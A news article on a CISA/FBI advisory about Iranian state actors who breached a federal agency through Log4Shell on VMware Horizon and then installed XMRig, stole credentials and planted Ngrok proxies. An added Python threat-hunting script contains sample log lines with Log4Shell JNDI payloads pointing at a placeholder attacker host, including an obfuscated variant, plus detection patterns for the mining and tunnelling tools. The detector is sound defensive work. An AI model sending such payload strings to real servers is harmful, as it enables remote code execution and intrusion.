U.S. security agencies on Wednesday revealed that Iranian government-sponsored threat actors breached the server of a federal agency in February and installed crypto-mining malware on its systems.
In an advisory, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) said it conducted “an incident response engagement” with the Federal Bureau of Investigation (FBI) in June/July to remediate the vulnerability and restrict unauthorized access.
The threat actor exploited the Log4Shell vulnerability in an unpatched VMware Horizon server to breach the agency, CISA said.
The threat actor not only installed crypto-mining malware on the compromised system but also moved laterally within the network, stole credentials, and implanted reverse proxies.
CISA and the FBI urged all U.S. organizations to install the latest updates for their systems and to take the other steps they laid out to improve their cybersecurity defenses.
Hackers Had Access for Several Months
The advisory did not identify the agency but said it was a civilian organization.
CISA said it first detected the intrusion in April while conducting retrospective analysis using EINSTEIN (CISA’s intrusion detection system). Further investigation showed that the actors compromised the affected agency in February 2022.
“In the course of incident response activities, CISA determined that cyber threat actors exploited the Log4Shell vulnerability in an unpatched VMware Horizon server, installed XMRig crypto mining software, moved laterally to the domain controller (DC), compromised credentials, and then implanted Ngrok reverse proxies on several hosts to maintain persistence,” the advisory reads.
The advisory contains a list of recommendations for organizations to protect against similar attacks. CISA also lays out how organizations can test their systems to see if they hold up against the techniques the attackers used to breach the unidentified agency.
Iranian authorities have yet to comment on the story. It is unclear whether the breach exposed any confidential information that could threaten the security of the affected federal agency or U.S. citizens.
About the Log4Shell Vulnerability
Log4Shell is a zero-day vulnerability affecting Log4j, the Apache Software Foundation’s ubiquitous Java logging library. The Apache Foundation first announced the Log4j vulnerability in December 2021. At the time, it was categorized as critical and received the maximum CVSS base score of 10 out of 10 in the National Vulnerability Database.
The vulnerability contributed to a record number of cyber attacks in 2021.
In their joint advisory, CISA and the FBI said that any organization that did not immediately apply available patches or workarounds should assume its network has been compromised. They advised such organizations to initiate threat-hunting activities.
If an organization detects a breach, it should assume the threat actor has moved laterally, and therefore investigate all connected systems, including domain controllers, and audit privileged accounts.
The mitigation best practices laid out in the advisory include:
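A starting point for the threat hunting the advisory recommends, as an added example that is not CISA's or the FBI's code: it scans constructed web-server access-log lines for Log4Shell JNDI lookup attempts (collapsing the nested ${lower:}/${upper:} wrappers that Log4j resolves before the lookup, which a plain string match would miss) and checks a constructed per-host process inventory for the tools named in the advisory (XMRig, Ngrok). The hostnames, file paths and the attacker.example domain are placeholders, not incident data.

```python
import re

# Tool names come from the advisory (XMRig miner, Ngrok reverse proxy); the file
# paths, hosts and log lines below are constructed samples, not incident data.
SUSPICIOUS_BINARIES = {"xmrig", "ngrok"}

# Log4j resolves nested ${lower:x}/${upper:x} lookups before it sees ${jndi:...},
# so a detector must collapse those wrappers first or it will miss wrapped attempts.
_WRAPPER = re.compile(r"\$\{(?:lower|upper):([^}]*)\}", re.IGNORECASE)
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

SAMPLE_ACCESS_LOG = [  # constructed combined-format lines; attacker.example is a placeholder
    '10.0.0.5 - - [03/Feb/2022:10:15:02 +0000] "GET /portal/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [03/Feb/2022:10:16:44 +0000] "GET /portal/ HTTP/1.1" 200 5120 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [03/Feb/2022:10:17:01 +0000] "GET /portal/ HTTP/1.1" 200 5120 "-" "${${lower:j}ndi:ldap://attacker.example/b}"',
]
SAMPLE_PROCESSES = [  # constructed (host, image path) pairs from a hypothetical process inventory
    ("web01", "C:\\Windows\\System32\\svchost.exe"),
    ("web01", "C:\\Users\\Public\\xmrig.exe"),
    ("dc01", "C:\\ProgramData\\ngrok.exe"),
    ("dc01", "C:\\Windows\\System32\\lsass.exe"),
]

def normalize_lookups(s: str) -> str:
    """Strip ${lower:..}/${upper:..} wrappers repeatedly until none remain."""
    prev = None
    while prev != s:
        prev, s = s, _WRAPPER.sub(lambda m: m.group(1), s)
    return s

def is_log4shell_attempt(line: str) -> bool:
    """True if the line carries a JNDI lookup after wrapper normalization."""
    return bool(_JNDI.search(normalize_lookups(line)))

def hunt_access_log(lines):
    """Return (line_number, line) for every line that looks like a Log4Shell attempt."""
    return [(n, l) for n, l in enumerate(lines, 1) if is_log4shell_attempt(l)]

def hunt_processes(procs):
    """Map host -> set of advisory-named tool stems found in its process inventory."""
    hits = {}
    for host, image in procs:
        stem = image.lower().replace("\\", "/").rsplit("/", 1)[-1].removesuffix(".exe")
        if stem in SUSPICIOUS_BINARIES:
            hits.setdefault(host, set()).add(stem)
    return hits

if __name__ == "__main__":
    print(hunt_access_log(SAMPLE_ACCESS_LOG))
    print(hunt_processes(SAMPLE_PROCESSES))
```

A hit in either hunt is a reason to widen the investigation to the domain controller and privileged accounts, as the advisory recommends, rather than a verdict on its own.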
- Installing updated builds to ensure affected VMware Horizon and UAG systems run on the latest version
- Keeping all software up to date
- Minimizing their internet-facing attack surface
- Using best practices for identity and access management (IAM), such as phishing-resistant MFA
- Enforcing better domain control systems
- Creating a deny list of credentials that are known to be compromised
- Securing credentials by restricting where accounts and credentials can be used